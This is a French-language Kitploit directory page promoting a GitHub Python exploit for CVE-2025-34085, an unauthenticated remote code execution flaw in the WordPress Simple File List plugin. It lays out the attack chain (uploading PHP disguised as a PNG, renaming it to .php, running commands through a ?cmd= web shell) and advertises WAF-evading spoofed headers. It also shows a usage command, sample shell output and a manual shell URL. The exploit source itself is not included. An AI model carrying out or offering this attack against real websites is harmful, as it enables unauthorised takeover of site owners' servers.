Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-34085 — Simple File List – Exploit RCE non authentifié (CVE-2025-34085) | Kitploit
Outils/GitHubGitHub/mrjhaxcore/cve-2025-34085
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed Teaming
GitHubmrjhaxcore/cve-2025-34085

CVE-2025-34085

Simple File List – Exploit RCE non authentifié (CVE-2025-34085)

Voir le dépôt
12il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

📂 Simple File List – Exploit RCE sans authentification (CVE-2025-34085)

⚠️ Code de l'exploit par : Mrj Haxcore

Un exploit Python entièrement fonctionnel pour le plugin WordPress Simple File List (<= 4.2.3), vulnérable à une exécution de code à distance (RCE) sans authentification en raison d'une logique d'upload et de renommage de fichiers peu sécurisée.


💣 Résumé de la vulnérabilité

  • Plugin : Simple File List (simple-file-list)
  • Version : <= 4.2.3
  • CVE : CVE-2025-34085
  • Impact : Les utilisateurs non authentifiés peuvent téléverser un fichier PHP déguisé en .png, puis le renommer en .php et exécuter du code arbitraire.
  • Exigences : Aucune authentification requise
  • Type d'exploit : Téléversement de fichier → Contournement du renommage → Exécution de commandes

✅ Fonctionnalités

  • 🚀 Chaîne d'exploitation entièrement automatisée
  • 📤 Constructeur manuel de multipart/form-data (contourne 415)
  • 🔁 Bruteforce de renommage pour .php, .php5, .phtml, etc.
  • 🛡️ En-têtes usurpés réalistes pour contourner les WAF
  • 🐚 Exécution de commandes via ?cmd=
  • 🧼 Sortie propre (sans résidus �PNG)

🛠 Utilisation

root@kitploit:~
python3 simple.py https://target.site

[+] Uploading shell as 8dkls0qp.png...
[+] Upload successful.
[+] Trying to rename to: 8dkls0qp.php...
[+] Rename successful: 8dkls0qp.php
[+] Triggering shell: https://target.site/wp-content/uploads/simple-file-list/8dkls0qp.php?cmd=id
[+] Shell output:
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Manual Visit

https://target.site/wp-content/uploads/simple-file-list/8dkls0qp.php?cmd=whoami
Télécharger l’outil